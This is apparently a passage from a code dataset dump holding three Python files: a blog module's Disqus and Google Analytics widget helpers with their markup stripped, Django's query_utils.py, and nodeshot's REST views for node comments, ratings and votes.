\n \n \n blog comments powered by Disqus\n \n ''' % {'developer': developer, 'site': config.disqus_site}\n return script\n \n \n \n\n def disqus_comments_count(self):\n \n config = self.i2p.config\n \n script = ''' \n \n ''' % {'site': config.disqus_site}\n \n \n return script\n \n\n\n\n def _disqus_last_comments(self):\n \n T = self.i2p.environment.T\n config = self.i2p.config\n \n if self.i2p.config.avatars_enabled:\n hide_avatars = 0\n else:\n hide_avatars = 1\n \n avatar_size = self.i2p.config.avatar_size\n recent_comments=T(\"Recent Comments\")\n num_items = 5\n \n script = '''\n
\n

%(recent_comments)s

\n \n
\n Powered by Disqus\n ''' % {'site': config.disqus_site, 'recent_comments': recent_comments, 'avatar_size': avatar_size, 'hide_avatars': hide_avatars, 'num_items': num_items}\n \n return script\n \n \n \n def sidebar_popular_threads(self): \n \n config = self.i2p.config \n popular_threads=''\n \n #for now only in disqus\n if config.comments_method in ['Disqus']: \n popular_threads='' % self._disqus_popular_threads()\n \n return popular_threads \n\n \n \n \n def _disqus_popular_threads(self):\n \n config = self.i2p.config\n T = self.i2p.environment.T\n popular_threads=T(\"Popular Threads\")\n script = '''\n
\n

%(popular_threads)s

\n \n
\n Powered by Disqus\n '''% {'site': config.disqus_site,'popular_threads':popular_threads}\n \n return script\n\n\n\n\n def sidebar_top_commenters(self): \n \n config = self.i2p.config \n top_commenters=''\n \n #for now only in disqus\n if config.comments_method in ['Disqus']: \n top_commenters='
%s
' % self._disqus_top_commenters()\n \n return top_commenters \n\n \n \n \n def _disqus_top_commenters(self):\n \n T = self.i2p.environment.T\n config = self.i2p.config\n avatar_size = self.i2p.config.avatar_size\n \n if self.i2p.config.avatars_enabled:\n hide_avatars = 0\n else:\n hide_avatars = 1\n \n num_items = 5\n \n \n top_commenters=T('Top Commenters')\n script = ''' \n
\n

%(top_commenters)s

\n \n
\n Powered by Disqus \n '''% {'site': config.disqus_site, 'top_commenters':top_commenters, 'avatar_size':avatar_size, 'hide_avatars':hide_avatars, 'num_items':num_items}\n \n return script\n \n \n \n def sidebar_combination(self): \n \n config = self.i2p.config \n T = self.i2p.environment.T \n head_combination = T('Posts')\n combination=''\n \n #for now only in disqus\n if config.comments_method in ['Disqus']: \n combination='

%s

%s
' % (head_combination, self._disqus_combination())\n \n return combination\n \n \n \n \n def _disqus_combination(self):\n \n config = self.i2p.config\n num_items = 5\n script = '''\n \n Powered by Disqus\n '''% {'site': config.disqus_site, 'num_items':num_items}\n \n return script\n\n\n\n\n def ga_script(self):\n \n config = self.i2p.config\n script=\"\"\n if config.ga_enabled:\n script = ''' \n \n ''' % {'ga_id': config.ga_id} \n \n \n return script\n\n\n"},"license":{"kind":"string","value":"gpl-2.0"}}},{"rowIdx":2498,"cells":{"repo_name":{"kind":"string","value":"umitproject/tease-o-matic"},"path":{"kind":"string","value":"django/db/models/query_utils.py"},"copies":{"kind":"string","value":"240"},"size":{"kind":"string","value":"5799"},"content":{"kind":"string","value":"\"\"\"\nVarious data structures used in query construction.\n\nFactored out from django.db.models.query to avoid making the main module very\nlarge and/or so that they can be used by other modules without getting into\ncircular import difficulties.\n\"\"\"\n\nimport weakref\nfrom django.utils.copycompat import deepcopy\n\nfrom django.db.backends import util\nfrom django.utils import tree\nfrom django.utils.datastructures import SortedDict\n\n\nclass InvalidQuery(Exception):\n \"\"\"\n The query passed to raw isn't a safe query to use with raw.\n \"\"\"\n pass\n\n\nclass QueryWrapper(object):\n \"\"\"\n A type that indicates the contents are an SQL fragment and the associate\n parameters. Can be used to pass opaque data to a where-clause, for example.\n \"\"\"\n def __init__(self, sql, params):\n self.data = sql, params\n\n def as_sql(self, qn=None, connection=None):\n return self.data\n\nclass Q(tree.Node):\n \"\"\"\n Encapsulates filters as objects that can then be combined logically (using\n & and |).\n \"\"\"\n # Connection types\n AND = 'AND'\n OR = 'OR'\n default = AND\n\n def __init__(self, *args, **kwargs):\n super(Q, self).__init__(children=list(args) + kwargs.items())\n\n def _combine(self, other, conn):\n if not isinstance(other, Q):\n raise TypeError(other)\n obj = type(self)()\n obj.add(self, conn)\n obj.add(other, conn)\n return obj\n\n def __or__(self, other):\n return self._combine(other, self.OR)\n\n def __and__(self, other):\n return self._combine(other, self.AND)\n\n def __invert__(self):\n obj = type(self)()\n obj.add(self, self.AND)\n obj.negate()\n return obj\n\nclass DeferredAttribute(object):\n \"\"\"\n A wrapper for a deferred-loading field. When the value is read from this\n object the first time, the query is executed.\n \"\"\"\n def __init__(self, field_name, model):\n self.field_name = field_name\n self.model_ref = weakref.ref(model)\n self.loaded = False\n\n def __get__(self, instance, owner):\n \"\"\"\n Retrieves and caches the value from the datastore on the first lookup.\n Returns the cached value.\n \"\"\"\n from django.db.models.fields import FieldDoesNotExist\n\n assert instance is not None\n cls = self.model_ref()\n data = instance.__dict__\n if data.get(self.field_name, self) is self:\n # self.field_name is the attname of the field, but only() takes the\n # actual name, so we need to translate it here.\n try:\n cls._meta.get_field_by_name(self.field_name)\n name = self.field_name\n except FieldDoesNotExist:\n name = [f.name for f in cls._meta.fields\n if f.attname == self.field_name][0]\n # We use only() instead of values() here because we want the\n # various data coersion methods (to_python(), etc.) to be called\n # here.\n val = getattr(\n cls._base_manager.filter(pk=instance.pk).only(name).using(\n instance._state.db).get(),\n self.field_name\n )\n data[self.field_name] = val\n return data[self.field_name]\n\n def __set__(self, instance, value):\n \"\"\"\n Deferred loading attributes can be set normally (which means there will\n never be a database lookup involved.\n \"\"\"\n instance.__dict__[self.field_name] = value\n\ndef select_related_descend(field, restricted, requested, reverse=False):\n \"\"\"\n Returns True if this field should be used to descend deeper for\n select_related() purposes. Used by both the query construction code\n (sql.query.fill_related_selections()) and the model instance creation code\n (query.get_cached_row()).\n\n Arguments:\n * field - the field to be checked\n * restricted - a boolean field, indicating if the field list has been\n manually restricted using a requested clause)\n * requested - The select_related() dictionary.\n * reverse - boolean, True if we are checking a reverse select related\n \"\"\"\n if not field.rel:\n return False\n if field.rel.parent_link and not reverse:\n return False\n if restricted:\n if reverse and field.related_query_name() not in requested:\n return False\n if not reverse and field.name not in requested:\n return False\n if not restricted and field.null:\n return False\n return True\n\n# This function is needed because data descriptors must be defined on a class\n# object, not an instance, to have any effect.\n\ndef deferred_class_factory(model, attrs):\n \"\"\"\n Returns a class object that is a copy of \"model\" with the specified \"attrs\"\n being replaced with DeferredAttribute objects. The \"pk_value\" ties the\n deferred attributes to a particular instance of the model.\n \"\"\"\n class Meta:\n proxy = True\n app_label = model._meta.app_label\n\n # The app_cache wants a unique name for each model, otherwise the new class\n # won't be created (we get an old one back). Therefore, we generate the\n # name using the passed in attrs. It's OK to reuse an existing class\n # object if the attrs are identical.\n name = \"%s_Deferred_%s\" % (model.__name__, '_'.join(sorted(list(attrs))))\n name = util.truncate_name(name, 80, 32)\n\n overrides = dict([(attr, DeferredAttribute(attr, model))\n for attr in attrs])\n overrides[\"Meta\"] = Meta\n overrides[\"__module__\"] = model.__module__\n overrides[\"_deferred\"] = True\n return type(name, (model,), overrides)\n\n# The above function is also used to unpickle model instances with deferred\n# fields.\ndeferred_class_factory.__safe_for_unpickling__ = True\n"},"license":{"kind":"string","value":"bsd-3-clause"}}},{"rowIdx":2499,"cells":{"repo_name":{"kind":"string","value":"chachan/nodeshot"},"path":{"kind":"string","value":"nodeshot/community/participation/views.py"},"copies":{"kind":"string","value":"5"},"size":{"kind":"string","value":"2627"},"content":{"kind":"string","value":"from django.utils.translation import ugettext_lazy as _\nfrom django.shortcuts import get_object_or_404\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\nfrom rest_framework import permissions, authentication, generics\nfrom rest_framework.response import Response\n\nfrom nodeshot.core.nodes.models import Node\nfrom .models import Rating, Vote, Comment\nfrom .serializers import * # noqa\n\n\nclass NodeRelationViewMixin(object):\n def initial(self, request, *args, **kwargs):\n \"\"\"\n Custom initial method:\n * ensure node exists and store it in an instance attribute\n * change queryset to return only comments of current node\n \"\"\"\n super(NodeRelationViewMixin, self).initial(request, *args, **kwargs)\n self.node = get_object_or_404(Node, **{'slug': self.kwargs['slug']})\n self.queryset = self.model.objects.filter(node_id=self.node.id)\n\n def perform_create(self, serializer):\n serializer.save(user=self.request.user)\n\n\nclass NodeComments(NodeRelationViewMixin, generics.ListCreateAPIView):\n \"\"\"\n ### GET\n\n Retrieve a **list** of comments for the specified node\n\n ### POST\n\n Add a comment to the specified node\n \"\"\"\n authentication_classes = (authentication.SessionAuthentication,)\n permission_classes = (permissions.IsAuthenticatedOrReadOnly,)\n serializer_class = CommentSerializer\n model = Comment\n\nnode_comments = NodeComments.as_view()\n\n\nclass NodeRatings(NodeRelationViewMixin, generics.CreateAPIView):\n \"\"\"\n ### POST\n\n Rate the specified node\n \"\"\"\n authentication_classes = (authentication.SessionAuthentication,)\n permission_classes = (permissions.IsAuthenticatedOrReadOnly,)\n serializer_class = RatingSerializer\n model = Rating\n\nnode_ratings = NodeRatings.as_view()\n\n\nclass NodeVotes(NodeRelationViewMixin, generics.CreateAPIView):\n \"\"\"\n ### POST\n\n Vote for the specified node\n \"\"\"\n authentication_classes = (authentication.SessionAuthentication,)\n permission_classes = (permissions.IsAuthenticatedOrReadOnly,)\n serializer_class = VoteSerializer\n model = Vote\n\n def delete(self, *args, **kwargs):\n votes = Vote.objects.filter(node_id=self.node.id, user_id=self.request.user.id)\n if (len(votes) > 0):\n for vote in votes:\n vote.delete()\n message = _('Vote for this node removed')\n status = 200\n else:\n message = _('User has not voted this node yet')\n status = 400\n return Response({'details': message}, status=status)\n\nnode_votes = NodeVotes.as_view()\n"},"license":{"kind":"string","value":"gpl-3.0"}}}],"truncated":false,"partial":false},"paginationData":{"pageIndex":24,"numItemsPerPage":100,"numTotalItems":101768,"offset":2400,"length":100}},"jwt":"eyJhbGciOiJFZERTQSJ9.eyJyZWFkIjp0cnVlLCJwZXJtaXNzaW9ucyI6eyJyZXBvLmNvbnRlbnQucmVhZCI6dHJ1ZX0sImlhdCI6MTc1NzkxNDY2MCwic3ViIjoiL2RhdGFzZXRzL3RyYW5zZm9ybWVyc2Jvb2svY29kZXBhcnJvdC12YWxpZCIsImV4cCI6MTc1NzkxODI2MCwiaXNzIjoiaHR0cHM6Ly9odWdnaW5nZmFjZS5jbyJ9.cUgxItHSj6NErurcHeF3sHXiW3TFr7UFMbfWqO_JInbZG9J7iAwUXmzzBjXLD70POLm32V7E7Xnq64pOYrCzAw","displayUrls":true},"discussionsStats":{"closed":0,"open":1,"total":1},"fullWidth":true,"hasGatedAccess":true,"hasFullAccess":true,"isEmbedded":false,"savedQueries":{"community":[],"user":[]}}">
repo_name
stringlengths
6
100
path
stringlengths
4
294
copies
stringlengths
1
5
size
stringlengths
4
6
content
stringlengths
606
896k
license
stringclasses
15 values
thomasrogers03/phantomjs
src/qt/qtwebkit/Tools/QueueStatusServer/config/messages.py
119
1677
# Copyright (C) 2013 Google Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # These must be in sync with webkit-patch's AbstractQueue. pass_status = "Pass" fail_status = "Fail" retry_status = "Retry" error_status = "Error"
bsd-3-clause
hynnet/openwrt-mt7620
staging_dir/target-mipsel_r2_uClibc-0.9.33.2/root-ralink/usr/lib/python2.7/distutils/emxccompiler.py
250
11931
"""distutils.emxccompiler Provides the EMXCCompiler class, a subclass of UnixCCompiler that handles the EMX port of the GNU C compiler to OS/2. """ # issues: # # * OS/2 insists that DLLs can have names no longer than 8 characters # We put export_symbols in a def-file, as though the DLL can have # an arbitrary length name, but truncate the output filename. # # * only use OMF objects and use LINK386 as the linker (-Zomf) # # * always build for multithreading (-Zmt) as the accompanying OS/2 port # of Python is only distributed with threads enabled. # # tested configurations: # # * EMX gcc 2.81/EMX 0.9d fix03 __revision__ = "$Id$" import os,sys,copy from distutils.ccompiler import gen_preprocess_options, gen_lib_options from distutils.unixccompiler import UnixCCompiler from distutils.file_util import write_file from distutils.errors import DistutilsExecError, CompileError, UnknownFileError from distutils import log class EMXCCompiler (UnixCCompiler): compiler_type = 'emx' obj_extension = ".obj" static_lib_extension = ".lib" shared_lib_extension = ".dll" static_lib_format = "%s%s" shared_lib_format = "%s%s" res_extension = ".res" # compiled resource file exe_extension = ".exe" def __init__ (self, verbose=0, dry_run=0, force=0): UnixCCompiler.__init__ (self, verbose, dry_run, force) (status, details) = check_config_h() self.debug_print("Python's GCC status: %s (details: %s)" % (status, details)) if status is not CONFIG_H_OK: self.warn( "Python's pyconfig.h doesn't seem to support your compiler. " + ("Reason: %s." % details) + "Compiling may fail because of undefined preprocessor macros.") (self.gcc_version, self.ld_version) = \ get_versions() self.debug_print(self.compiler_type + ": gcc %s, ld %s\n" % (self.gcc_version, self.ld_version) ) # Hard-code GCC because that's what this is all about. # XXX optimization, warnings etc. should be customizable. self.set_executables(compiler='gcc -Zomf -Zmt -O3 -fomit-frame-pointer -mprobe -Wall', compiler_so='gcc -Zomf -Zmt -O3 -fomit-frame-pointer -mprobe -Wall', linker_exe='gcc -Zomf -Zmt -Zcrtdll', linker_so='gcc -Zomf -Zmt -Zcrtdll -Zdll') # want the gcc library statically linked (so that we don't have # to distribute a version dependent on the compiler we have) self.dll_libraries=["gcc"] # __init__ () def _compile(self, obj, src, ext, cc_args, extra_postargs, pp_opts): if ext == '.rc': # gcc requires '.rc' compiled to binary ('.res') files !!! try: self.spawn(["rc", "-r", src]) except DistutilsExecError, msg: raise CompileError, msg else: # for other files use the C-compiler try: self.spawn(self.compiler_so + cc_args + [src, '-o', obj] + extra_postargs) except DistutilsExecError, msg: raise CompileError, msg def link (self, target_desc, objects, output_filename, output_dir=None, libraries=None, library_dirs=None, runtime_library_dirs=None, export_symbols=None, debug=0, extra_preargs=None, extra_postargs=None, build_temp=None, target_lang=None): # use separate copies, so we can modify the lists extra_preargs = copy.copy(extra_preargs or []) libraries = copy.copy(libraries or []) objects = copy.copy(objects or []) # Additional libraries libraries.extend(self.dll_libraries) # handle export symbols by creating a def-file # with executables this only works with gcc/ld as linker if ((export_symbols is not None) and (target_desc != self.EXECUTABLE)): # (The linker doesn't do anything if output is up-to-date. # So it would probably better to check if we really need this, # but for this we had to insert some unchanged parts of # UnixCCompiler, and this is not what we want.) # we want to put some files in the same directory as the # object files are, build_temp doesn't help much # where are the object files temp_dir = os.path.dirname(objects[0]) # name of dll to give the helper files the same base name (dll_name, dll_extension) = os.path.splitext( os.path.basename(output_filename)) # generate the filenames for these files def_file = os.path.join(temp_dir, dll_name + ".def") # Generate .def file contents = [ "LIBRARY %s INITINSTANCE TERMINSTANCE" % \ os.path.splitext(os.path.basename(output_filename))[0], "DATA MULTIPLE NONSHARED", "EXPORTS"] for sym in export_symbols: contents.append(' "%s"' % sym) self.execute(write_file, (def_file, contents), "writing %s" % def_file) # next add options for def-file and to creating import libraries # for gcc/ld the def-file is specified as any other object files objects.append(def_file) #end: if ((export_symbols is not None) and # (target_desc != self.EXECUTABLE or self.linker_dll == "gcc")): # who wants symbols and a many times larger output file # should explicitly switch the debug mode on # otherwise we let dllwrap/ld strip the output file # (On my machine: 10KB < stripped_file < ??100KB # unstripped_file = stripped_file + XXX KB # ( XXX=254 for a typical python extension)) if not debug: extra_preargs.append("-s") UnixCCompiler.link(self, target_desc, objects, output_filename, output_dir, libraries, library_dirs, runtime_library_dirs, None, # export_symbols, we do this in our def-file debug, extra_preargs, extra_postargs, build_temp, target_lang) # link () # -- Miscellaneous methods ----------------------------------------- # override the object_filenames method from CCompiler to # support rc and res-files def object_filenames (self, source_filenames, strip_dir=0, output_dir=''): if output_dir is None: output_dir = '' obj_names = [] for src_name in source_filenames: # use normcase to make sure '.rc' is really '.rc' and not '.RC' (base, ext) = os.path.splitext (os.path.normcase(src_name)) if ext not in (self.src_extensions + ['.rc']): raise UnknownFileError, \ "unknown file type '%s' (from '%s')" % \ (ext, src_name) if strip_dir: base = os.path.basename (base) if ext == '.rc': # these need to be compiled to object files obj_names.append (os.path.join (output_dir, base + self.res_extension)) else: obj_names.append (os.path.join (output_dir, base + self.obj_extension)) return obj_names # object_filenames () # override the find_library_file method from UnixCCompiler # to deal with file naming/searching differences def find_library_file(self, dirs, lib, debug=0): shortlib = '%s.lib' % lib longlib = 'lib%s.lib' % lib # this form very rare # get EMX's default library directory search path try: emx_dirs = os.environ['LIBRARY_PATH'].split(';') except KeyError: emx_dirs = [] for dir in dirs + emx_dirs: shortlibp = os.path.join(dir, shortlib) longlibp = os.path.join(dir, longlib) if os.path.exists(shortlibp): return shortlibp elif os.path.exists(longlibp): return longlibp # Oops, didn't find it in *any* of 'dirs' return None # class EMXCCompiler # Because these compilers aren't configured in Python's pyconfig.h file by # default, we should at least warn the user if he is using a unmodified # version. CONFIG_H_OK = "ok" CONFIG_H_NOTOK = "not ok" CONFIG_H_UNCERTAIN = "uncertain" def check_config_h(): """Check if the current Python installation (specifically, pyconfig.h) appears amenable to building extensions with GCC. Returns a tuple (status, details), where 'status' is one of the following constants: CONFIG_H_OK all is well, go ahead and compile CONFIG_H_NOTOK doesn't look good CONFIG_H_UNCERTAIN not sure -- unable to read pyconfig.h 'details' is a human-readable string explaining the situation. Note there are two ways to conclude "OK": either 'sys.version' contains the string "GCC" (implying that this Python was built with GCC), or the installed "pyconfig.h" contains the string "__GNUC__". """ # XXX since this function also checks sys.version, it's not strictly a # "pyconfig.h" check -- should probably be renamed... from distutils import sysconfig import string # if sys.version contains GCC then python was compiled with # GCC, and the pyconfig.h file should be OK if string.find(sys.version,"GCC") >= 0: return (CONFIG_H_OK, "sys.version mentions 'GCC'") fn = sysconfig.get_config_h_filename() try: # It would probably better to read single lines to search. # But we do this only once, and it is fast enough f = open(fn) try: s = f.read() finally: f.close() except IOError, exc: # if we can't read this file, we cannot say it is wrong # the compiler will complain later about this file as missing return (CONFIG_H_UNCERTAIN, "couldn't read '%s': %s" % (fn, exc.strerror)) else: # "pyconfig.h" contains an "#ifdef __GNUC__" or something similar if string.find(s,"__GNUC__") >= 0: return (CONFIG_H_OK, "'%s' mentions '__GNUC__'" % fn) else: return (CONFIG_H_NOTOK, "'%s' does not mention '__GNUC__'" % fn) def get_versions(): """ Try to find out the versions of gcc and ld. If not possible it returns None for it. """ from distutils.version import StrictVersion from distutils.spawn import find_executable import re gcc_exe = find_executable('gcc') if gcc_exe: out = os.popen(gcc_exe + ' -dumpversion','r') try: out_string = out.read() finally: out.close() result = re.search('(\d+\.\d+\.\d+)',out_string) if result: gcc_version = StrictVersion(result.group(1)) else: gcc_version = None else: gcc_version = None # EMX ld has no way of reporting version number, and we use GCC # anyway - so we can link OMF DLLs ld_version = None return (gcc_version, ld_version)
gpl-2.0
arenadata/ambari
ambari-server/src/main/resources/common-services/AMBARI_INFRA/0.1.0/package/scripts/setup_infra_solr.py
2
5041
""" Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from resource_management.core.exceptions import Fail from resource_management.core.source import InlineTemplate, Template from resource_management.core.resources.system import Directory, File from resource_management.libraries.functions.decorator import retry from resource_management.libraries.functions.format import format from resource_management.libraries.functions import solr_cloud_util def setup_infra_solr(name = None): import params if name == 'server': Directory([params.infra_solr_log_dir, params.infra_solr_piddir, params.infra_solr_datadir, params.infra_solr_data_resources_dir], mode=0755, cd_access='a', create_parents=True, owner=params.infra_solr_user, group=params.user_group ) Directory([params.solr_dir, params.infra_solr_conf], mode=0755, cd_access='a', owner=params.infra_solr_user, group=params.user_group, create_parents=True, recursive_ownership=True ) File(params.infra_solr_log, mode=0644, owner=params.infra_solr_user, group=params.user_group, content='' ) File(format("{infra_solr_conf}/infra-solr-env.sh"), content=InlineTemplate(params.solr_env_content), mode=0755, owner=params.infra_solr_user, group=params.user_group ) File(format("{infra_solr_datadir}/solr.xml"), content=InlineTemplate(params.solr_xml_content), owner=params.infra_solr_user, group=params.user_group ) File(format("{infra_solr_conf}/log4j.properties"), content=InlineTemplate(params.solr_log4j_content), owner=params.infra_solr_user, group=params.user_group ) custom_security_json_location = format("{infra_solr_conf}/custom-security.json") File(custom_security_json_location, content=InlineTemplate(params.infra_solr_security_json_content), owner=params.infra_solr_user, group=params.user_group, mode=0640 ) jaas_file = params.infra_solr_jaas_file if params.security_enabled else None url_scheme = 'https' if params.infra_solr_ssl_enabled else 'http' create_ambari_solr_znode() security_json_file_location = custom_security_json_location \ if params.infra_solr_security_json_content and str(params.infra_solr_security_json_content).strip() \ else format("{infra_solr_conf}/security.json") # security.json file to upload if params.security_enabled: File(format("{infra_solr_jaas_file}"), content=Template("infra_solr_jaas.conf.j2"), owner=params.infra_solr_user) File(format("{infra_solr_conf}/security.json"), content=Template("infra-solr-security.json.j2"), owner=params.infra_solr_user, group=params.user_group, mode=0640) solr_cloud_util.set_cluster_prop( zookeeper_quorum=params.zookeeper_quorum, solr_znode=params.infra_solr_znode, java64_home=params.java64_home, prop_name="urlScheme", prop_value=url_scheme, jaas_file=jaas_file ) solr_cloud_util.setup_kerberos_plugin( zookeeper_quorum=params.zookeeper_quorum, solr_znode=params.infra_solr_znode, jaas_file=jaas_file, java64_home=params.java64_home, secure=params.security_enabled, security_json_location=security_json_file_location ) if params.security_enabled: solr_cloud_util.secure_solr_znode( zookeeper_quorum=params.zookeeper_quorum, solr_znode=params.infra_solr_znode, jaas_file=jaas_file, java64_home=params.java64_home, sasl_users_str=params.infra_solr_sasl_user ) elif name == 'client': solr_cloud_util.setup_solr_client(params.config) else : raise Fail('Nor client or server were selected to install.') @retry(times=30, sleep_time=5, err_class=Fail) def create_ambari_solr_znode(): import params solr_cloud_util.create_znode( zookeeper_quorum=params.zookeeper_quorum, solr_znode=params.infra_solr_znode, java64_home=params.java64_home, retry=30, interval=5)
apache-2.0
alqfahad/odoo
addons/fetchmail/__init__.py
437
1120
#-*- coding:utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>). All Rights Reserved # [email protected] # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import fetchmail import res_config # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
MobinRanjbar/hue
desktop/core/ext-py/South-1.0.2/south/introspection_plugins/geodjango.py
153
1286
""" GeoDjango introspection rules """ import django from django.conf import settings from south.modelsinspector import add_introspection_rules has_gis = "django.contrib.gis" in settings.INSTALLED_APPS if has_gis: # Alright,import the field from django.contrib.gis.db.models.fields import GeometryField # Make some introspection rules if django.VERSION[0] == 1 and django.VERSION[1] >= 1: # Django 1.1's gis module renamed these. rules = [ ( (GeometryField, ), [], { "srid": ["srid", {"default": 4326}], "spatial_index": ["spatial_index", {"default": True}], "dim": ["dim", {"default": 2}], "geography": ["geography", {"default": False}], }, ), ] else: rules = [ ( (GeometryField, ), [], { "srid": ["_srid", {"default": 4326}], "spatial_index": ["_index", {"default": True}], "dim": ["_dim", {"default": 2}], }, ), ] # Install them add_introspection_rules(rules, ["^django\.contrib\.gis"])
apache-2.0
rcatwood/Savu
savu/plugins/loaders/image_loader.py
1
3329
# Copyright 2014 Diamond Light Source Ltd. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ .. module:: temp_loader :platform: Unix :synopsis: A class for loading standard tomography data in a variety of formats. .. moduleauthor:: Nicola Wadeson <[email protected]> """ import h5py import tempfile import numpy as np from savu.plugins.base_loader import BaseLoader from savu.plugins.utils import register_plugin @register_plugin class ImageLoader(BaseLoader): """ A class to load tomography data from a Nexus file :param image_type: Type of image. Choose from 'FabIO'. Default: 'FabIO'. :param angles: A python statement to be evaluated or a file. Default: None. :param frame_dim: Which dimension requires stitching? Default: 0. """ def __init__(self, name='ImageLoader'): super(ImageLoader, self).__init__(name) def setup(self): exp = self.exp data_obj = exp.create_data_object('in_data', 'tomo') rot = 0 detY = 1 detX = 2 data_obj.set_axis_labels('rotation_angle.degrees', 'detector_y.pixel', 'detector_x.pixel') data_obj.add_pattern('PROJECTION', core_dir=(detX, detY), slice_dir=(rot,)) data_obj.add_pattern('SINOGRAM', core_dir=(detX, rot), slice_dir=(detY,)) dtype = self.parameters['image_type'] mod = __import__('savu.data.data_structures.data_type', fromlist=dtype) clazz = getattr(mod, dtype) path = exp.meta_data.get_meta_data("data_file") data_obj.data = clazz(path, data_obj, [self.parameters['frame_dim']]) self.set_rotation_angles(data_obj) # dummy file filename = path.split('/')[-1] + '.h5' data_obj.backing_file = \ h5py.File(tempfile.mkdtemp() + '/' + filename, 'a') data_obj.set_shape(data_obj.data.get_shape()) self.set_data_reduction_params(data_obj) def set_rotation_angles(self, data_obj): angles = self.parameters['angles'] if angles is None: angles = np.linspace(0, 180, data_obj.data.get_shape()[0]) else: try: exec("angles = " + angles) except: try: angles = np.loadtxt(angles) except: raise Exception('Cannot set angles in loader.') n_angles = len(angles) data_angles = data_obj.data.get_shape()[0] if data_angles is not n_angles: raise Exception("The number of angles %s does not match the data " "dimension length %s", n_angles, data_angles) data_obj.meta_data.set_meta_data("rotation_angle", angles)
gpl-3.0
courtarro/gnuradio
gr-channels/python/channels/__init__.py
54
1350
# # Copyright 2012-2013 Free Software Foundation, Inc. # # This file is part of GNU Radio # # GNU Radio is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3, or (at your option) # any later version. # # GNU Radio is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with GNU Radio; see the file COPYING. If not, write to # the Free Software Foundation, Inc., 51 Franklin Street, # Boston, MA 02110-1301, USA. # ''' Blocks for channel models and related functions. ''' import os try: from channels_swig import * except ImportError: dirname, filename = os.path.split(os.path.abspath(__file__)) __path__.append(os.path.join(dirname, "..", "..", "swig")) from channels_swig import * # Blocks for Hardware Impairments from amp_bal import * from conj_fs_iqcorr import * from distortion_2_gen import * from distortion_3_gen import * from iqbal_gen import * from impairments import * from phase_bal import * from phase_noise_gen import * from quantizer import *
gpl-3.0
suyashphadtare/test
erpnext/hr/doctype/appraisal/appraisal.py
1
2344
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3. See license.txt from __future__ import unicode_literals import frappe from frappe.utils import flt, getdate from frappe import _ from frappe.model.mapper import get_mapped_doc from frappe.model.document import Document from erpnext.hr.utils import set_employee_name class Appraisal(Document): def validate(self): if not self.status: self.status = "Draft" set_employee_name(self) self.validate_dates() self.validate_existing_appraisal() self.calculate_total() def get_employee_name(self): self.employee_name = frappe.db.get_value("Employee", self.employee, "employee_name") return self.employee_name def validate_dates(self): if getdate(self.start_date) > getdate(self.end_date): frappe.throw(_("End Date can not be less than Start Date")) def validate_existing_appraisal(self): chk = frappe.db.sql("""select name from tabAppraisal where employee=%s and (status='Submitted' or status='Completed') and ((start_date>=%s and start_date<=%s) or (end_date>=%s and end_date<=%s))""", (self.employee,self.start_date,self.end_date,self.start_date,self.end_date)) if chk: frappe.throw(_("Appraisal {0} created for Employee {1} in the given date range").format(chk[0][0], self.employee_name)) def calculate_total(self): total, total_w = 0, 0 for d in self.get('appraisal_details'): if d.score: d.score_earned = flt(d.score) * flt(d.per_weightage) / 100 total = total + d.score_earned total_w += flt(d.per_weightage) if int(total_w) != 100: 